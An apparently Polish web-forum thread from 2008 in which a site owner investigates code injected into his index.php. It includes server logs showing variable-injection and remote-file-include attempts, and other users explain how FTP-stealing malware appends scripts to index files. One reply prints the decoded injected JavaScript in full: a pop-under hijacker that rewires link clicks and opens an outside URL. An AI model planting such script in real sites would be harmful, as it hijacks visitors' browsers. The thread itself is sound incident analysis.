wlam na serwer czy moja wina? doklejka kodu do index.php

[sirapacz]

jedyne co mnei w logu zaciekawilo to to:

Kod:

[Tue Jul 08 03:16:53 2008] [error] [client 69.57.154.47] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.57.154.47', file '/home/sircomp/ftp/index.php')
[Tue Jul 08 03:16:54 2008] [error] [client 69.57.154.47] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable 'GLOBALS' through GET variables (attacker '69.57.154.47', file '/home/sircomp/ftp/index.php')
[Tue Jul 08 03:16:54 2008] [error] [client 69.57.154.47] FastCGI: comm with server "/usr/local/apache/fcgi-bin/php-fcgi" aborted: error parsing headers: malformed header 'HTTP 1.0 301 Moved Permanently'
[Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
[Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
[Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
[Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
[Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')
[Tue Jul 08 07:26:58 2008] [error] [client 69.36.9.146] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.36.9.146', file '/home/sircomp/ftp/index.php')

[sirapacz]

jeszcze jedno mnie zaintrygowalo ale to w dniu innym niz data modyfikacji
Log z tego dnia jest 3x wiekszy niz zwykle (mam maly ruch)
tamtego pliku:

Kod:

[Mon Jun 16 12:03:49 2008] [error] [client 67.225.198.22] FastCGI: server "/usr/local/apache/fcgi-bin/php-fcgi" stderr: ALERT - Include filename ('http://www.autoimmoannonce.com/lang/i???/components/com_remository/com_remository_constants.php') is an URL that is not allowed (attacker '67.225.198.22', file '/home/sircomp/ftp/administrator/components/com_remository/admin.remository.php', line 16)

moze mi ktos pomoc to rozszyfrowac?

[dexter]

http://blog.richnetapps.com/index.php/poisoned-websites

[sirapacz]

dzieki za linka - sporo mi to podpowiada..........
ps. stalem sie ofiara z mojej glupoty - nie chcialo mi sie zawsze instalowac av - po co...swiadomie korzystam z sieci, stoje za natem i to podwojnym a tu bach....
wychodzi na to ze podpieprzono mi hasla i ktos manualnie sie zalogowal lub automat ktory wyciaga ftpa konto i haslo i sam szuka pliku index.php w roocie - cos takiego nie powinno byc trudne do napisania....
ychhh...

[domdi]

<script language="javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "advmaker_komap";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://busyfgves.com/cgi-bin/index.cgi?dx";var fea_wnd = "scrollbars=›esizable=1,toolbar=1,location=1,menub ar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script>

to jest rozkodowany kod
przeskanuj innymi skanerami kompa/kompy które mają dostęp do ftp. widocznie ten wirus szuka plików index.* i do nich dopisuje sobie kodzik. ostatnio się spotkałem z taką sytuacją że kiedy wgrywane były zdjęcia na serwer przez ftp to pojawiał się podobny wpis.